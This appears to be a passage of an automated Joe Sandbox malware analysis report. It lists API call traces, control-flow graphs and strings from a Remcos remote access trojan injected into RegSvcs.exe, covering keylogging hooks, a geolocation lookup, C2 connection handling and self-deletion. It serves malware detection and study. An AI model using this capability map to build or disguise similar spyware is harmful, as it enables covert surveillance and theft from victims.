                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad$HandleModule
                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                              • API String ID: 4236061018-3687161714
                              • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                              • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                              • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                              • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1260 40a2b8-40a2cf 1261 40a2d1-40a2eb GetModuleHandleA SetWindowsHookExA 1260->1261 1262 40a333-40a343 GetMessageA 1260->1262 1261->1262 1265 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1261->1265 1263 40a345-40a35d TranslateMessage DispatchMessageA 1262->1263 1264 40a35f 1262->1264 1263->1262 1263->1264 1266 40a361-40a366 1264->1266 1265->1266
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                              • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                              • GetLastError.KERNEL32 ref: 0040A2ED
                                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                              • TranslateMessage.USER32(?), ref: 0040A34A
                              • DispatchMessageA.USER32(?), ref: 0040A355
                              Strings
                              • Keylogger initialization failure: error , xrefs: 0040A301
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                              • String ID: Keylogger initialization failure: error
                              • API String ID: 3219506041-952744263
                              • Opcode ID: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                              • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                              • Opcode Fuzzy Hash: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                              • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1277 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1282 41b3c5-41b3e6 InternetReadFile 1277->1282 1283 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1282->1283 1284 41b40c-41b40f 1282->1284 1283->1284 1285 41b411-41b413 1284->1285 1286 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1284->1286 1285->1282 1285->1286 1290 41b427-41b431 1286->1290
                              APIs
                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                              • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                              • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                              Strings
                              • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleOpen$FileRead
                              • String ID: http://geoplugin.net/json.gp
                              • API String ID: 3121278467-91888290
                              • Opcode ID: 4404311406b4a12e258bc180555c1bc499fb9e537e63fa9c5eb012b199318316
                              • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                              • Opcode Fuzzy Hash: 4404311406b4a12e258bc180555c1bc499fb9e537e63fa9c5eb012b199318316
                              • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00413549: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                                • Part of subcall function 00413549: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                • Part of subcall function 00413549: RegCloseKey.KERNELBASE(?), ref: 00413592
                              • Sleep.KERNELBASE(00000BB8), ref: 0040F85B
                              • ExitProcess.KERNEL32 ref: 0040F8CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseExitOpenProcessQuerySleepValue
                              • String ID: 4.9.4 Pro$override$pth_unenc
                              • API String ID: 2281282204-930821335
                              • Opcode ID: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                              • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                              • Opcode Fuzzy Hash: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                              • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                              APIs
                              • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                              Strings
                              • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Create$EventLocalThreadTime
                              • String ID: KeepAlive | Enabled | Timeout:
                              • API String ID: 2532271599-1507639952
                              • Opcode ID: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                              • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                              • Opcode Fuzzy Hash: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                              • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                              APIs
                              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,011CE5D8), ref: 00433849
                              • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Crypt$Context$AcquireRandomRelease
                              • String ID:
                              • API String ID: 1815803762-0
                              • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                              • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                              • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                              • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                              APIs
                              • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,004750E4), ref: 0041B62A
                              • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Name$ComputerUser
                              • String ID:
                              • API String ID: 4229901323-0
                              • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                              • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                              • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                              • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                              APIs
                              • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID:
                              • API String ID: 2299586839-0
                              • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                              • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                              • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                              • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 48 40eef2-40ef03 call 401fd8 23->48 69->70 102 40f34f-40f36a call 401fab call 4139a9 call 412475 69->102 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 90 40ec13-40ec1a 79->90 91 40ec0c-40ec0e 79->91 80->79 98 40ebec-40ec02 call 401fab call 4139a9 80->98 95 40ec1c 90->95 96 40ec1e-40ec2a call 41b2c3 90->96 94 40eef1 91->94 94->48 95->96 103 40ec33-40ec37 96->103 104 40ec2c-40ec2e 96->104 98->79 124 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 102->124 107 40ec76-40ec89 call 401e65 call 401fab 103->107 108 40ec39 call 407716 103->108 104->103 129 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->129 130 40ec8b call 407755 107->130 117 40ec3e-40ec40 108->117 121 40ec42-40ec47 call 407738 call 407260 117->121 122 40ec4c-40ec5f call 401e65 call 401fab 117->122 121->122 122->107 141 40ec61-40ec67 122->141 157 40f3a5-40f3af call 40dd42 call 414f2a 124->157 177 40ed80-40ed84 129->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 129->178 130->129 141->107 144 40ec69-40ec6f 141->144 144->107 147 40ec71 call 407260 144->147 147->107 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 205 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->205 233 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->233 182 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->182 183 40ee0f-40ee19 call 409057 181->183 192 40ee1e-40ee42 call 40247c call 434798 182->192 183->192 213 40ee51 192->213 214 40ee44-40ee4f call 436e90 192->214 205->177 216 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 213->216 214->216 271 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 216->271 286 40efc1 233->286 287 40efdc-40efde 233->287 271->233 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 271->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->233 306 40eeef 288->306 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->94 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 356 40f159-40f16c call 401e65 call 401fab 347->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->357 368 40f1cc-40f1df call 401e65 call 401fab 356->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->369 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2df call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 426 40f2e4-40f2e7 416->426 418->416 426->157 428 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 426->428 443 40f346-40f34b DeleteFileW 428->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->124 445->124 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                              APIs
                                • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000104), ref: 0040E9EE
                                • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                              • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                              • API String ID: 2830904901-472099794
                              • Opcode ID: 9dbae48a280d3333a9d77f8d0747098945c713f3f6b336d54fdc187ddd26b95e
                              • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                              • Opcode Fuzzy Hash: 9dbae48a280d3333a9d77f8d0747098945c713f3f6b336d54fdc187ddd26b95e
                              • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 567 415210-415225 call 404f51 call 4048c8 560->567 568 4151e5-41520b call 402093 * 2 call 41b4ef 560->568 583 415aa3-415ab5 call 404e26 call 4021fa 561->583 567->583 584 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 567->584 568->583 596 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 583->596 597 415add-415ae5 call 401e8d 583->597 648 415380-41538d call 405aa6 584->648 649 415392-4153b9 call 401fab call 4135a6 584->649 596->597 597->477 648->649 655 4153c0-41577f call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->655 656 4153bb-4153bd 649->656 782 415781 call 404aa1 655->782 656->655 783 415786-415a0a call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a0f-415a16 783->901 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 904 415a21-415a23 902->904 905 415a33-415a38 call 40b051 903->905 906 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->906 904->903 905->906 917 415a71-415a7d CreateThread 906->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 906->918 917->918 918->583
                              APIs
                              • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                              • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                              • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep$ErrorLastLocalTime
                              • String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                              • API String ID: 524882891-3356775444
                              • Opcode ID: 37b1bb3a0d30f17b52b07895542944880f65f934667ff10557e506737dee5ee7
                              • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                              • Opcode Fuzzy Hash: 37b1bb3a0d30f17b52b07895542944880f65f934667ff10557e506737dee5ee7
                              • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                              Control-flow Graph

                              APIs
                              • Sleep.KERNELBASE(00001388), ref: 0040A740
                                • Part of subcall function 0040A675: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                • Part of subcall function 0040A675: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,0040A74D), ref: 0040A6EE
                              • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 0040A77C
                              • GetFileAttributesW.KERNELBASE(00000000), ref: 0040A78D
                              • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 0040A7A4
                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
                              • String ID: 8SG$8SG$pQG$pQG$PG$PG
                              • API String ID: 110482706-1152054767
                              • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                              • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                              • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                              • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1023 4048c8-4048e8 connect 1024 404a1b-404a1f 1023->1024 1025 4048ee-4048f1 1023->1025 1028 404a21-404a2f WSAGetLastError 1024->1028 1029 404a97 1024->1029 1026 404a17-404a19 1025->1026 1027 4048f7-4048fa 1025->1027 1030 404a99-404a9e 1026->1030 1031 404926-404930 call 420c60 1027->1031 1032 4048fc-404923 call 40531e call 402093 call 41b4ef 1027->1032 1028->1029 1033 404a31-404a34 1028->1033 1029->1030 1045 404941-40494e call 420e8f 1031->1045 1046 404932-40493c 1031->1046 1032->1031 1035 404a71-404a76 1033->1035 1036 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1033->1036 1038 404a7b-404a94 call 402093 * 2 call 41b4ef 1035->1038 1036->1029 1038->1029 1055 404950-404973 call 402093 * 2 call 41b4ef 1045->1055 1056 404987-404992 call 421a40 1045->1056 1046->1038 1085 404976-404982 call 420ca0 1055->1085 1068 4049c4-4049d1 call 420e06 1056->1068 1069 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1056->1069 1082 4049d3-4049f6 call 402093 * 2 call 41b4ef 1068->1082 1083 4049f9-404a14 CreateEventW * 2 1068->1083 1069->1085 1082->1083 1083->1026 1085->1029
                              APIs
                              • connect.WS2_32(?,?,?), ref: 004048E0
                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                              • WSAGetLastError.WS2_32 ref: 00404A21
                                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
